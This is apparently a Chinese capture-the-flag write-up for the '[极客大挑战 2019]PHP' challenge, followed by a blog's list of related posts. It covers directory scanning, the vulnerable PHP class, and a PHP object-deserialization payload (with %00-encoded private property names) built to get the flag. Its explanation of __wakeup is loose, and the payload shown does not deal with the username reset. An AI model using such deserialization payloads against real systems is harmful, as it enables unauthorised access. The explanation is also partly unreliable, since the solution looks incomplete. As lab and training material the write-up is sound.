[极客大挑战 2019]PHP

  1. 题目:
  2. 解题思路及步骤:看到题目没什么思路,于是就尝试去扫目录:发现有个有用的目录:www.zip: -x400-600 排除状态码为400-600的
  3. 于是我们进行访问,果然得到一个新文件www.zip,查看发现有以下内容:
  1. 查看flag.php,肯定不会再这么明显的地方,
  2. 查看index.php文件发现真正的题目在这里:这里是包含了文件,class.php,可知是一个反序列化题目,我们查看一下class.php文件,得到:
python 复制代码
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }
//wakeup()函数的作用是反序列化之前调用,并将username这个属性赋值为guest
//下面这个函数是在对象被销毁时调用
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
//这里可以知道密码应为100,用户名应该为admin
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
  1. 于是编写脚本:
php 复制代码
<?php
  class Name{
  private $username = 'admin';
  private $password = '100';
}
$a = new Name();
echo serialize($a);
?>
//输出得到:
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
O表示 序列化类型为对象
4:对象名长度
Name:对象名
2:属性名个数
s:第一个属性类型为字符串
14:第一属性的长度(由于是私有属性,其实际长度比看到的要长,多了类名首尾的空格)
NameusernameL:空格+类名+空格+属性名
后面同理
  1. 由于反序列化后两个空格不见了,这时候在传参为O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}这里面得空格就看不见了,这样也确实得不到结果:因此使用空格的url编码将其表示出来:O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
  2. 得到flag:
相关推荐
多加点辣也没关系37 分钟前
JavaScript|第4章:类型转换
开发语言·javascript
聪慧的水蜜桃38 分钟前
【YFIOs】用C#开发硬件之设备上云
开发语言·c#
yqcoder1 小时前
httpOnly 是什么,又有什么用?
开发语言·前端·javascript
wuqingshun3141592 小时前
重写equals而不重写hashCode,会出什么问题?
java·开发语言
飞猪~2 小时前
LangChain python 版本 第一集
开发语言·python·langchain
星幻元宇VR2 小时前
公共安全实训展厅设备【人防知识学习系统】
科技·学习·安全
HackTwoHub3 小时前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
李燚4 小时前
Go 项目怎么组织:DDD 4 层 vs MVC vs 脚本式
开发语言·golang·mvc·ddd·agent框架·eino
2zcode4 小时前
免费开源项目文档:基于MATLAB图像处理的啤酒瓶口缺陷检测系统设计与实现
开发语言·图像处理·matlab
人工智能时代 准备好了吗5 小时前
AI回答内容进入率监测:引用识别、文本匹配与语义判断
开发语言·人工智能·python